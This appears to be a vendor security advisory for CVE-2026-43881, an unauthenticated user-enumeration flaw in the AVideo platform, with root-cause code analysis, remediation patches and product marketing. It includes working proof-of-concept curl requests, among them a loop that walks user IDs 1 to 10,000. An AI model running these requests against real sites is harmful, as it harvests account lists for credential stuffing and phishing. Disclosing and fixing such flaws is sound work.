CVE-2026-43881

CVE-2026-43881 is a medium-severity missing authentication for critical function vulnerability in wwbn/avideo (composer), affecting versions <= 29.0. No fixed version is listed yet.

Summary

objects/users.json.php exposes two unauthenticated paths that disclose the full set of registered user accounts. The isCompany request parameter causes the handler to set $ignoreAdmin = true for any non-admin caller (including unauthenticated visitors), which defeats the admin-only guard inside User::getAllUsers()/User::getTotalUsers(). A second path accepts users_id and calls User::getUserFromID() directly with no permission check, producing a single-user oracle. Both paths return id, identification (display name), channel URL, photo, background, and status, plus the total account count.

Details

Root cause #1, isCompany admin bypass

objects/users.json.php:13-53 (HEAD, v29.0):

$canAdminUsers = canAdminUsers();                                    // line 13, for output filtering only
...
if (!empty($_REQUEST['users_id'])) {
    $user = User::getUserFromID($_REQUEST['users_id']);              // path #2
    ...
} else if (empty($_REQUEST['user_groups_id'])) {
    $isAdmin     = null;
    $isCompany   = null;
    $ignoreAdmin = canSearchUsers() ? true : false;
    ...
    if (isset($_REQUEST['isCompany'])) {                              // line 39
        $isCompany = intval($_REQUEST['isCompany']);
        if (!$canAdminUsers) {
            if (User::isACompany()) { $isCompany = 0; }
            else                    { $isCompany = 1; }
            $ignoreAdmin = true;                                      // line 47, bypass flag
        }
    }
    ...
    $users = User::getAllUsers($ignoreAdmin, [...], @$_GET['status'], $isAdmin, $isCompany);
    $total = User::getTotalUsers($ignoreAdmin, @$_GET['status'], $isAdmin, $isCompany);
}

User::isACompany() with no argument (objects/user.php:1629-1646) returns !empty($_SESSION['user']['is_company']), which is false for unauthenticated visitors. So the anonymous-attacker branch takes the else arm: $isCompany = 1; $ignoreAdmin = true;.

The admin-only guards in User::getAllUsers() (objects/user.php:2315-2321) and User::getTotalUsers() (objects/user.php:2480-2484) are now short-circuited:

public static function getAllUsers($ignoreAdmin = false, ...) {
    if (!Permissions::canAdminUsers() && !$ignoreAdmin) {   // $ignoreAdmin === true → guard skipped
        _error_log('You are not admin and cannot list all users');
        return false;
    }
    ...
    $sql = "SELECT * FROM users u WHERE 1=1 ...";
    if (isset($isCompany)) {
        if (!empty($isCompany) && $isCompany == self::$is_company_status_ISACOMPANY || ...) {
            $sql .= " AND is_company = $isCompany ";
        } else {
            $sql .= " AND (is_company = 0 OR is_company IS NULL) ";
        }
    }

Note: when the attacker supplies isCompany=0, the else branch is taken because of PHP's operator precedence (!empty($isCompany) && ... short-circuits to false), and the SQL filter becomes is_company = 0 OR is_company IS NULL, i.e. every non-company user. Combined with the bypass, this returns the entire user table in chunks controlled by the attacker-supplied rowCount.

Root cause #2, users_id single-record oracle

objects/users.json.php:20-29 calls User::getUserFromID($_REQUEST['users_id']) with no auth check. User::getUserFromID() (objects/user.php:2028-2075) queries SELECT * FROM users WHERE id = ? and returns id, identification, photo, background, status, channelName, about, tags, with only password/recoverPass/PII stripped for non-admins. The handler then wraps this in the standard BootGrid envelope with total = 1 when the user exists and total = 0 otherwise, a perfect sequential-ID existence oracle.

Why there is no blocking mitigation

  • No router-level auth: the .htaccess rewrite (.htaccess:317) maps /users.json directly to this file.
  • No CSRF/origin gate: the file is explicitly listed in objects/functionsSecurity.php:893 under “Read-only endpoints that accept POST params”, meaning the same-origin/CSRF middleware is skipped by design.
  • The output-filter block (objects/users.json.php:66-77) only limits which fields are echoed, it does not suppress existence or display-name leakage, and total is always echoed on line 97.
  • rowCount is attacker-controlled with no upper bound (line 17-18 only sets a default of 10).

PoC

Target: a default AVideo 29.0 install at http://target/. No session cookie, no CSRF token, no API key required.

Path 1, bulk listing via isCompany admin-check bypass

$ curl -s 'http://target/objects/users.json.php?isCompany=0&rowCount=1000&current=1'
{"current":1,"rowCount":1000,"total":42,"rows":[
  {"id":"1","identification":"admin","photo":"https://target/videos/userPhoto/photo1.png",
   "background":"https://target/...","status":"a","creator":"<div ...channel URL...>"},
  {"id":"2","identification":"alice",...,"status":"a",...},
  ...
]}

The same call with isCompany=1 returns the subset of company-flagged users; isCompany=0 returns all non-company users. Both branches set $ignoreAdmin = true.

Path 2, sequential-ID existence / display-name oracle

$ for i in $(seq 1 10000); do
    curl -s "http://target/objects/users.json.php?users_id=$i" \
      | jq -r '[.total, .rows[0].id, .rows[0].identification, .rows[0].status] | @tsv'
  done
1	1	admin	a
1	2	alice	a
0	null	null	null
1	4	bob	i
...

total=1 → ID exists; identification field leaks the login/display name; status reveals active (a) vs inactive (i).

Verification of the branch logic

// Reproduces objects/users.json.php:39-48 for an unauthenticated attacker.
$canAdminUsers = false; $ignoreAdmin = false;
$_SESSION = [];                      // unauthenticated
$_REQUEST = ['isCompany' => '1'];
if (isset($_REQUEST['isCompany'])) {
    $isCompany = intval($_REQUEST['isCompany']);
    if (!$canAdminUsers) {
        $isACompany = !empty($_SESSION['user']['is_company']);   // false
        $isCompany   = $isACompany ? 0 : 1;
        $ignoreAdmin = true;
    }
}
var_dump($isCompany, $ignoreAdmin);  // int(1) bool(true)  → admin guard SKIPPED

Impact

An unauthenticated remote attacker can:

  • Enumerate every user account on the platform (display names, numeric IDs, channel URLs/usernames, active/inactive status, profile photo/background URLs).
  • Obtain the total registered-user count, useful for platform sizing and post-compromise reporting.
  • Build a targeted username list for credential stuffing, password spraying, or phishing against AVideo’s login/password-recovery endpoints.
  • Cross-reference leaked display names against the known password-recovery oracle to identify valid targets.

No auth is required, the request is a single unauthenticated GET, and rowCount is unbounded, so the full user list can be harvested in one request.

A critical operation is accessible without requiring any authentication. Typical impact: any user can invoke the privileged function.

CVE-2026-43881 has a CVSS score of 5.3 (Medium). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.

Affected versions

wwbn/avideo (<= 29.0)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

  1. Require authentication at the top of objects/users.json.php, and gate the bulk-listing path to users who legitimately need to search:

    require_once $global['systemRootPath'] . 'objects/user.php';
    User::loginCheck();                         // reject anonymous callers
    if (!canSearchUsers()) {
        header('HTTP/1.1 403 Forbidden');
        die('{"error":"forbidden"}');
    }
    
  2. Remove the isCompany-driven $ignoreAdmin = true branch (users.json.php:41-48). It served no purpose that the explicit canSearchUsers() check above does not already cover, and its only observable effect is the bypass described here.

  3. Gate the users_id path behind the same check, or restrict its output to the caller’s own record when the caller is not an admin:

    if (!empty($_REQUEST['users_id'])) {
        $requestedId = intval($_REQUEST['users_id']);
        if (!canSearchUsers() && $requestedId !== User::getId()) {
            header('HTTP/1.1 403 Forbidden');
            die('{"error":"forbidden"}');
        }
        $user = User::getUserFromID($requestedId);
        ...
    }
    
  4. Consider clamping $_REQUEST['rowCount'] to a sane ceiling (e.g. 100) and removing objects/users.json.php from the CSRF-bypass list in objects/functionsSecurity.php:893 unless there is a specific mobile-client requirement, and if there is, route it through an authenticated API token instead of making the endpoint anonymously reachable.

Frequently Asked Questions

  1. What is CVE-2026-43881? CVE-2026-43881 is a medium-severity missing authentication for critical function vulnerability in wwbn/avideo (composer), affecting versions <= 29.0. No fixed version is listed yet. A critical operation is accessible without requiring any authentication.
  2. How severe is CVE-2026-43881? CVE-2026-43881 has a CVSS score of 5.3 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of wwbn/avideo are affected by CVE-2026-43881? wwbn/avideo (composer) versions <= 29.0 is affected.
  4. Is there a fix for CVE-2026-43881? No fixed version is listed for CVE-2026-43881 yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is CVE-2026-43881 exploitable, and should I be worried? Whether CVE-2026-43881 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-43881 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-43881? No fixed version is listed yet. In the interim: Keep the dependency up to date. Add authentication gating to all sensitive endpoints.

Other vulnerabilities in wwbn/avideo

CVE-2026-33731CVE-2026-33692CVE-2026-33684CVE-2026-54458CVE-2026-50183

Stop the waste.
Protect your environment with Kodem.